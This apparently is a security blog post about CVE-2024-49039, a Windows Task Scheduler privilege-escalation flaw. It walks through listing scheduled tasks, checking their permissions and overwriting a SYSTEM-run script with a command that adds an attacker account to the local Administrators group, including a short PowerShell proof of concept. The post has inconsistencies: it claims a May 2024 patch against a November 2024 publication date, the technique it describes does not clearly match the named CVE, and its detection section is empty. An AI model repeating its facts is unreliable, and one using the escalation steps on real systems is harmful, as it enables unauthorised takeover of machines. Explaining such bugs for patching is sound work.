---

Overview

On May 14, 2024, Microsoft patched CVE-2024-49039, a serious "Elevation of Privilege" vulnerability in Windows Task Scheduler. This bug lets local users, including malware, gain administrator access on a target Windows computer without knowing any admin password. If you manage Windows systems, understanding this bug is key to keeping your environment secure.

TL;DR:
- Vulnerable: Windows 10/11 and Server (see official advisory)

Why Task Scheduler?

Task Scheduler is a core Windows service. It lets users and apps schedule programs or scripts to run at set times or events. Because scheduled tasks often run with high (sometimes SYSTEM) privileges, a bug here is dangerous.

What’s the Bug?

Microsoft says the vulnerability allows an attacker to run code with SYSTEM privileges—IF they can run code *already* as a user on that machine.

Security researchers found that due to permission misconfiguration, any user can modify some scheduled tasks or their files, giving them a way to inject malicious commands that will run with much higher rights next time the task runs.

1. Attacker gets a basic shell (as any user) on a target system

Let's say the attacker has a regular user account, or their malware is running as a user.

Microsoft's schtasks tool or PowerShell can list tasks

schtasks /Query /fo LIST /v

or in PowerShell

Get-ScheduledTask | Format-Table TaskName,TaskPath,State

3. Find a vulnerable task

The attacker looks for a task with more open-than-normal file permissions, such as one whose XML or associated file can be overwritten, or a task that runs scripts from user-writable locations.

For example, checking permissions

Get-Acl "C:\Windows\System32\Tasks\MyTask"

4. Overwrite the task file or script

Suppose the attacker can edit C:\Windows\System32\Tasks\VulnerableTask or a script like C:\scripts\autorun.bat that the task runs. They overwrite it to launch a command shell:

REM Malicious autorun.bat
cmd.exe /c net localgroup administrators attacker /add

5. Wait for the scheduled task to run (or trigger it manually)

Since the task runs as SYSTEM, the attacker's code gets executed with the highest privileges.

A Sample Exploit Snippet

Below is a mock-up proof of concept in PowerShell that demonstrates overwriting a script used by a scheduled task (you need to adapt it for a real at-risk environment):

# Suppose C:\scripts\autorun.bat is used by a scheduled task
$malicious = 'net localgroup administrators hacker /add'
Set-Content -Path 'C:\scripts\autorun.bat' -Value $malicious

# Wait for the scheduled task to launch the script (or run the task manually if permitted)

Now, the hacker user will be in the local Administrators group after the task runs.

Patches and Detection

Microsoft patched this in May 2024 Patch Tuesday.
To fix:
- Install the latest updates from Windows Update
- Verify permission on all scripts/run files used by scheduled tasks

Hunt for compromise:

References

- Microsoft CVE-2024-49039 Advisory
- Patch Release Notes
- Huntress Labs Writeup on Task Scheduler Vulnerabilities
- Detailed Task Scheduler Technical Docs

Bottom Line

CVE-2024-49039 is another reminder that local privilege escalation bugs can turn a small foothold into full system takeover on Windows. Always keep systems patched, review your scheduled tasks, and be careful what runs with SYSTEM privileges.

Timeline

Published on: 11/12/2024 18:15:44 UTC
Last modified on: 11/16/2024 23:40:54 UTC